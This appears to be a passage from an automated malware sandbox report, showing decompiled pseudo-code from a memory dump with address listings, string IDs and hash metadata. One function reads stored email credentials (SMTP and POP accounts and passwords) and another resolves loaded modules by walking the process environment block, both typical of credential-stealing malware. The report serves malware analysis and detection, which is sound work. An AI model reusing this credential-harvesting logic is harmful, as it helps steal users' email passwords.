					_t45 = E00404BEE(_t67,  *_t72, L"SmtpAccount");
					_v12 = _v12 & 0x00000000;
					_v32 = _t45;
					_t47 = E00404C4E(_t71,  *_t72, L"SmtpPassword",  &_v12);
					_t77 = _t75 + 0x50;
					_v36 = _t47;
					if(_v8 != 0 || _v12 != 0) {
						E00405872( *0x49f934, _t71, 1, 0);
						E00405872( *0x49f934, _t67, 1, 0);
						_t74 = _v16;
						E00405872( *0x49f934, _v16, 1, 0);
						E00405781( *0x49f934, _v40);
						E00405872( *0x49f934, _v20, 1, 0);
						_push(_v8);
						E00405762(_v16,  *0x49f934, _v24);
						E00405872( *0x49f934, _v28, 1, 0);
						E00405781( *0x49f934, _v44);
						E00405872( *0x49f934, _v32, 1, 0);
						_push(_v12);
						E00405762(_t74,  *0x49f934, _v36);
						_t77 = _t77 + 0x88;
					} else {
						_t74 = _v16;
					}
					E0040471C(_t71);
					E0040471C(_t67);
					E0040471C(_t74);
					E0040471C(_v20);
					E0040471C(_v24);
					E0040471C(_v28);
					E0040471C(_v32);
					E0040471C(_v36);
				}
				return 1;
			}





















                                        0x0040d070
                                        0x0040d080
                                        0x0040d084
                                        0x0040d086
                                        0x0040d08c
                                        0x0040d0a0
                                        0x0040d0ae
                                        0x0040d0bd
                                        0x0040d0c0
                                        0x0040d0c5
                                        0x0040d0c9
                                        0x0040d0e3
                                        0x0040d0f2
                                        0x0040d101
                                        0x0040d104
                                        0x0040d109
                                        0x0040d110
                                        0x0040d11e
                                        0x0040d123
                                        0x0040d126
                                        0x0040d12d
                                        0x0040d145
                                        0x0040d154
                                        0x0040d15a
                                        0x0040d166
                                        0x0040d174
                                        0x0040d186
                                        0x0040d18e
                                        0x0040d19a
                                        0x0040d1ac
                                        0x0040d1ba
                                        0x0040d1cc
                                        0x0040d1d1
                                        0x0040d1dd
                                        0x0040d1e2
                                        0x0040d1e7
                                        0x0040d1e7
                                        0x0040d1e7
                                        0x0040d1eb
                                        0x0040d1f1
                                        0x0040d1f7
                                        0x0040d1ff
                                        0x0040d207
                                        0x0040d20f
                                        0x0040d217
                                        0x0040d21f
                                        0x0040d227
                                        0x0040d230

                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000010.00000002.466439679.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID: EmailAddress$PopAccount$PopPassword$PopPort$PopServer$SmtpAccount$SmtpPassword$SmtpPort$SmtpServer$Technology
                                        • API String ID: 0-2111798378
                                        • Opcode ID: 4f23c8655d16a9709c8d74bd686147b8dbb65e0931b573aa619d5bf1b9c89d18
                                        • Instruction ID: 091e628055053f5eef329adcdd4db079f25726ad560f051e033024c376855220
                                        • Opcode Fuzzy Hash: 4f23c8655d16a9709c8d74bd686147b8dbb65e0931b573aa619d5bf1b9c89d18
                                        • Instruction Fuzzy Hash: AE414EB5941218BADF127BE6DD42F9E7F76EF94304F21003AF600721B2C77A99609B48
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0040317B, Relevance: .0, Instructions: 46COMMON
                                        Download Yara Rule
                                        C-Code - Quality: 90%
                                        			E0040317B(intOrPtr _a4) {
				signed int _v8;
				intOrPtr _v12;
				void* __ecx;
				intOrPtr _t17;
				void* _t21;
				intOrPtr* _t23;
				void* _t26;
				void* _t28;
				intOrPtr* _t31;
				void* _t33;
				signed int _t34;

				_push(_t25);
				_t1 =  &_v8;
				 *_t1 = _v8 & 0x00000000;
				_t34 =  *_t1;
				_v8 =  *[fs:0x30];
				_t23 =  *((intOrPtr*)( *((intOrPtr*)(_v8 + 0xc)) + 0xc));
				_t31 = _t23;
				do {
					_v12 =  *((intOrPtr*)(_t31 + 0x18));
					_t28 = E00402C77(_t34,  *((intOrPtr*)(_t31 + 0x28)));
					_pop(_t26);
					_t35 = _t28;
					if(_t28 == 0) {
						goto L3;
					} else {
						E004032EA(_t35, _t28, 0);
						_t21 = E00402C38(_t26, _t28, E00405D24(_t28) + _t19);
						_t33 = _t33 + 0x14;
						if(_a4 == _t21) {
							_t17 = _v12;
						} else {
							goto L3;
						}
					}
					L5:
					return _t17;
					L3:
					_t31 =  *_t31;
				} while (_t23 != _t31);
				_t17 = 0;
				goto L5;
			}














                                        0x0040317f
                                        0x00403180
                                        0x00403180
                                        0x00403180
                                        0x0040318d
                                        0x00403196
                                        0x00403199
                                        0x0040319b
                                        0x004031a1
                                        0x004031a9
                                        0x004031ab
                                        0x004031ac
                                        0x004031ae
                                        0x00000000
                                        0x004031b0
                                        0x004031b3
                                        0x004031c2
                                        0x004031c7
                                        0x004031cd
                                        0x004031e0
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x004031cd
                                        0x004031d7
                                        0x004031dd
                                        0x004031cf
                                        0x004031cf
                                        0x004031d1
                                        0x004031d5
                                        0x00000000

                                        Memory Dump Source
                                        • Source File: 00000010.00000002.466439679.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 5b57611fa40680ed248d57f37b4973e9bad199baf80beacdc2a2503593addd55
                                        • Instruction ID: 125f84157e295c2adc52e6f8c9cb261871d96e12da6c9e12f7e31892ee598d11
                                        • Opcode Fuzzy Hash: 5b57611fa40680ed248d57f37b4973e9bad199baf80beacdc2a2503593addd55
                                        • Instruction Fuzzy Hash: 0B01A272A10204ABDB21DF59C885E6FF7FCEB49761F10417FF804A7381D639AE008A64
                                        Uniqueness

                                        Uniqueness Score: -1.00%